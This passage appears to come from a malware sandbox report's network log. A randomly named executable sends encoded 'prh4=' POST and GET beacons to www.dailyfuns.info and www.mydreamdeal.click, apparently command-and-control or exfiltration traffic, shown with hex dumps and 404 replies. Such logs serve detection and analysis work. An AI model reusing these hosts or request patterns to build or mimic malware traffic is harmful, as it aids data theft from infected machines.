                                                                      Data Raw: 70 72 68 34 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 46 50 71 50 58 62 53 48 75 78 79 72 58 32 64 43 37 64 55 43 59 5a 39 32 62 48 4b 44 47 69 6c 4f 72 41 68 4d 36 2b 36 4c 51 44 37 4d 42 32 65 6b 57 72 6d 42 6d 34 6d 4e 77 65 64 64 54 77 6c 46 6b 5a 48 31 75 50 59 75 57 34 78 46 54 72 6f 36 65 48 69 45 76 53 6f 6f 77 4a 48 42 45 5a 39 36 46 54 75 66 56 76 36 79 54 72 4d 4e 77 6b 6b 59 74 4a 33 67 32 35 67 4e 37 6a 73 2b 71 34 75 6a 4a 55 4d 75 6f 4c 68 36 6f 77 63 47 4d 36 4b 44 76 46 53 53 76 38 79 7a 46 79 5a 44 2f 31 5a 6b 4c 42 46 4d 79 54 73 41 3d 3d
                                                                      Data Ascii: prh4=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanFPqPXbSHuxyrX2dC7dUCYZ92bHKDGilOrAhM6+6LQD7MB2ekWrmBm4mNweddTwlFkZH1uPYuW4xFTro6eHiEvSoowJHBEZ96FTufVv6yTrMNwkkYtJ3g25gN7js+q4ujJUMuoLh6owcGM6KDvFSSv8yzFyZD/1ZkLBFMyTsA==
                                                                      Nov 20, 2024 09:24:51.957765102 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:51 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.1050007209.74.77.109806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:53.930926085 CET1790OUTPOST /n9b0/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Origin: http://www.dailyfuns.info
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.dailyfuns.info/n9b0/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 4e 50 72 2b 33 62 41 52 6d 78 78 72 58 32 54 69 37 63 55 43 5a 44 39 32 44 62 4b 43 37 56 6c 4c 76 41 68 76 79 2b 38 36 51 44 77 4d 42 32 42 55 57 71 6f 68 6d 74 6d 4e 68 32 64 64 44 77 6c 46 6b 5a 48 32 32 50 49 4d 75 34 69 56 54 71 76 36 65 4c 6d 45 75 50 6f 6f 5a 79 48 42 4a 6d 39 71 6c 54 76 2f 46 76 38 41 37 72 55 64 77 69 6a 59 74 52 33 67 37 2b 67 4e 6e 76 73 38 4c 6a 75 67 5a 55 4d 4c 4a 55 7a 75 5a 72 4e 32 45 45 4c 78 69 76 51 79 37 65 34 7a 6b 6b 4f 79 7a 4f 4a 6c 53 2b 50 66 54 2b 2f 75 73 54 4b 33 68 39 30 79 62 45 66 57 65 53 4c 61 39 59 6a 38 68 4e 4f 6a 61 75 2f 70 57 58 6a 58 2b 48 4c 49 79 47 30 71 4d 52 56 58 6c 36 73 70 6f 2b 41 33 67 4d 39 71 73 50 67 7a 59 69 4f 73 73 43 2f 34 73 36 67 50 6b 31 6d 65 45 58 45 31 65 61 41 6a 41 47 6e 66 2f 56 58 50 41 2f 6e 50 79 6a 4a 6a 35 4d 6d 59 46 31 53 6c 70 7a 74 45 38 49 34 78 56 53 62 38 34 4b 78 [TRUNCATED]
                                                                      Data Ascii: prh4=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanNPr+3bARmxxrX2Ti7cUCZD92DbKC7VlLvAhvy+86QDwMB2BUWqohmtmNh2ddDwlFkZH22PIMu4iVTqv6eLmEuPooZyHBJm9qlTv/Fv8A7rUdwijYtR3g7+gNnvs8LjugZUMLJUzuZrN2EELxivQy7e4zkkOyzOJlS+PfT+/usTK3h90ybEfWeSLa9Yj8hNOjau/pWXjX+HLIyG0qMRVXl6spo+A3gM9qsPgzYiOssC/4s6gPk1meEXE1eaAjAGnf/VXPA/nPyjJj5MmYF1SlpztE8I4xVSb84KxCizqoeKijHzqAG8GmAfA/w/VZMQmgwKWE4SbqFXPnbI2K9IxV1OkhZyZNwkZm0ZpPvKG9KiRwqqE+bgASlxSgnf9J4VUwQPSOvG+uuJ3yTQOkmS+w4BryAV4hFRj6LMCcQ/Fs/ChHsGcX6mLDXaXEWu27M0R5V5+IX4I/FgRreeS/DmYZIAcULp1dYj23f6zpC49Nh9WQmwSnm0tNTNsD91AvxOBIWjqnsXXj8bo03cNdll2lLNKr4ty8tfmAnkHAhnlUEFjP06cdbrD+JvhV1UOa0EgLsIPJZwTiY8QBnwvyh5U8UuyQKV9G/Y6Dw4H9tUPLP+U+0MwmJIYeJbYNZJnQgzUr1UsVyHkpdH0kIp+NUl33J6vbRIcDxq3Jv2sVg9Ya6XHAg/OmWM+WNE3FPBbiBJrGnP9qMCz4XJJKoWDtDNpFSu7PEmjD9yg+E91N/CNq+CuwKGCYuQxsCsnTzDp0kTS/pxxzT3lVdey7JQj81gQlwqEUHxjuETBXhr3pnrrAuSGzFhrPl0NwUCvF1shidaXh8AogY6qOFpzH9cP7/Rf/9o/Yjp4MHJbT6B05m6mIbZkfHAz9+uTDH+4lEai24fKLoTUYUTii7SHfqOLxyubEKb4KRzi8sWqFHOCUsgh4CrqdvxK7DnBkr0HUz5ocR9ZACHepU [TRUNCATED]
                                                                      Nov 20, 2024 09:24:54.511640072 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:54 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.1050008209.74.77.109806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:56.477067947 CET495OUTGET /n9b0/?prh4=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4udfcATptjj7os9tTYvN+mNNekq8bw==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dailyfuns.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:57.083714962 CET548INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:56 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.1050009188.114.96.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:25:02.137579918 CET762OUTPOST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 42 4f 42 41 4e 70 56 62 51 4e 6d 32 67 33 54 59 38 4f 37 62 73 6f 70 79 6a 52 48 41 41 4e 65 62 54 35 33 70 58 39 77 46 76 76 31 51 53 77 56 31 6d 46 31 6b 67 37 66 46 53 47 76 6e 6d 31 47 51 46 4c 43 78 4e 62 31 71 47 34 37 59 41 44 42 38 49 54 44 49 38 71 69 4c 38 4b 36 68 34 65 59 2f 2b 68 66 72 39 6d 2b 30 45 51 51 79 64 65 77 4b 32 36 43 6f 6f 6f 63 53 75 67 33 55 7a 37 4d 79 67 4b 49 76 5a 6a 49 41 65 4b 32 63 4d 31 6c 72 68 47 76 57 42 34 6c 74 31 33 35 76 67 50 7a 2b 35 37 39 46 5a 6b 70 33 4e 56 67 73 77 55 54 52
                                                                      Data Ascii: prh4=1XpfOM1gsz3GBOBANpVbQNm2g3TY8O7bsopyjRHAANebT53pX9wFvv1QSwV1mF1kg7fFSGvnm1GQFLCxNb1qG47YADB8ITDI8qiL8K6h4eY/+hfr9m+0EQQydewK26CooocSug3Uz7MygKIvZjIAeK2cM1lrhGvWB4lt135vgPz+579FZkp3NVgswUTR
                                                                      Nov 20, 2024 09:25:02.842266083 CET1049INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:02 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:02 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20QctgtnUAu12sMW441BhxUscYiFWId6jrw%2F66N3kmYCsDXASlFClJyBMlF7pf0I%2FTj3Bn%2FK%2FnoDT6QXP%2B8siTxSUIfJF4n5gLj9rzFjKD%2FHzzT9RbzkXaPP6bTu8JoBh8eZ9raDSg8%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c0ec82e42bd-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.1050010188.114.96.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:25:04.685705900 CET786OUTPOST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 36 62 55 59 48 70 57 2b 6f 46 73 76 31 51 47 41 56 77 69 46 31 56 67 37 62 6e 53 48 54 6e 6d 78 57 51 46 4f 2b 78 4e 73 70 74 55 34 37 61 4c 6a 42 69 58 44 44 49 38 71 69 4c 38 4b 2b 4c 34 65 41 2f 2b 52 50 72 38 48 2b 37 4e 77 51 78 55 2b 77 4b 67 4b 44 76 6f 6f 64 46 75 68 62 74 7a 34 30 79 67 49 67 76 63 6e 55 48 51 4b 32 65 43 56 6c 2f 6d 32 53 64 44 37 5a 70 77 6e 30 67 38 2b 76 63 33 36 41 43 49 31 49 67 65 69 38 69 2b 53 6d 37 41 63 50 76 38 4e 37 66 58 38 4d 68 48 39 2f 37 50 53 71 67 37 41 3d 3d
                                                                      Data Ascii: prh4=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/6bUYHpW+oFsv1QGAVwiF1Vg7bnSHTnmxWQFO+xNsptU47aLjBiXDDI8qiL8K+L4eA/+RPr8H+7NwQxU+wKgKDvoodFuhbtz40ygIgvcnUHQK2eCVl/m2SdD7Zpwn0g8+vc36ACI1Igei8i+Sm7AcPv8N7fX8MhH9/7PSqg7A==
                                                                      Nov 20, 2024 09:25:05.414819002 CET1043INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:05 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:05 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEryPHZFxfvqARwhFeSZQfE%2Bc5NVrs7g2mM%2FkI7FTYHvfnY0KYQI31TV4aszXfbQ4WPOWoJWlu0pn56tLwUyOsw6z9kV%2Bj60sC5jhyBpsqHoJaIblw0smN2Il9D7ESn5u01t3Ot6Hak%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c1ebf881a03-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.1050011188.114.96.3806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:25:07.229406118 CET1799OUTPOST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 79 62 55 76 76 70 58 66 6f 46 74 76 31 51 61 51 56 78 69 46 31 79 67 37 6a 6a 53 48 66 52 6d 33 4b 51 45 73 6d 78 4c 64 70 74 65 34 37 61 45 44 42 6a 49 54 44 5a 38 71 79 50 38 4b 4f 4c 34 65 41 2f 2b 54 48 72 31 32 2b 37 42 51 51 79 64 65 77 47 32 36 43 49 6f 6f 30 77 75 68 66 69 7a 6f 55 79 75 49 51 76 65 79 49 48 63 4b 32 59 46 56 6b 34 6d 32 65 53 44 37 31 66 77 6d 78 33 38 35 72 63 30 64 35 4b 4e 55 4d 59 42 55 34 4c 6e 67 43 52 47 37 7a 4a 6c 64 47 73 57 38 4e 38 61 50 79 65 4f 52 7a 38 6a 56 47 72 57 2f 73 61 6d 33 54 76 61 78 48 63 7a 51 33 33 6c 79 49 48 77 72 38 79 57 2b 76 32 55 42 6c 75 55 33 4b 7a 79 4a 63 36 48 42 45 4b 34 6c 2b 6a 5a 68 61 67 35 44 51 68 57 53 4e 57 67 6b 43 43 6b 55 47 62 65 42 68 52 30 77 49 36 34 65 43 75 6b 77 49 38 5a 39 75 67 48 69 33 35 44 49 75 66 42 70 76 59 48 4e 56 31 6e 7a 69 48 74 31 66 4a 66 76 37 56 5a 6c 50 62 4e [TRUNCATED]
                                                                      Data Ascii: prh4=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/ybUvvpXfoFtv1QaQVxiF1yg7jjSHfRm3KQEsmxLdpte47aEDBjITDZ8qyP8KOL4eA/+THr12+7BQQydewG26CIoo0wuhfizoUyuIQveyIHcK2YFVk4m2eSD71fwmx385rc0d5KNUMYBU4LngCRG7zJldGsW8N8aPyeORz8jVGrW/sam3TvaxHczQ33lyIHwr8yW+v2UBluU3KzyJc6HBEK4l+jZhag5DQhWSNWgkCCkUGbeBhR0wI64eCukwI8Z9ugHi35DIufBpvYHNV1nziHt1fJfv7VZlPbN7Ssw+UO7tJG1XBT6f5qqWq6AxBc+DP1MNcCEIYx4zIBVsm0jXRmckcprDsnK/OORrgOGOgC1sbmby1Oc6PB7eVwWr0ptILyFxOU9hsxLoTGl1lvVANm2rKiRv0qeHqbdcoDDTxSfEDWdju9v3HcmKnGafzuSOStZokcpLS+TKNeBu7BGd1GZWlmiJYOAbWsr1ZAnRAbd96Q8Yd4XkbTsNQCvVtcBsYcgTm77+faamwkjzpnYzKQF8sGk8krVY0b44BJOss8FPz+DyaboIrTvXqe64jXIAfIOLCsCnZPF96cpMwpauXfns/6zbRdhTBxm7i+9PxB0oQ0aGaw0FN+WzrBYXK3YaXDMT+5O0n2YlngaoFhk5fA6VzieJSpvd8365dQxGWFDaS0xzarCXtX11Dnd5rH0i6+58+DStNqe2ylsdfhGsz5vfDY9cXJriJrT4a7s+FSqpz4h8Ejrcfqr+9fXcHxaDcXAhAAjzuqM7Xod+WltwGcFb2uyeTg4nGf/ikoMoSJd9QjXabHkDZAod9HB24F3NPsbR9zdTsv7BDNvzHYxk8QMeKiJ48DhHddPMGRFVG1w79ALZzhnBUt3Srgy7kcnkrSI02xkSkDTfHPZoS30TW6lt4ZxYz1lvINj2PHpxVz/JWm0lBtMRSnJeKgxDsOgjhm/yU [TRUNCATED]
                                                                      Nov 20, 2024 09:25:07.927017927 CET1037INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:25:07 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 20 Nov 2024 08:25:07 GMT
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9r5o9D6kHiNolSFOI8NMqmiLcZAVT8i1n5j3VEBjxvcB9aCGr6gLJLwKizHcMYvwW2vEv68nKJERP1VCYJdvWudnKmWR0FSbsqmQhDnQO3rxzb07wmZ%2F422und0avyehxa%2Ff1fa0Q38%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570c2e9c9a42d1-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1799&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
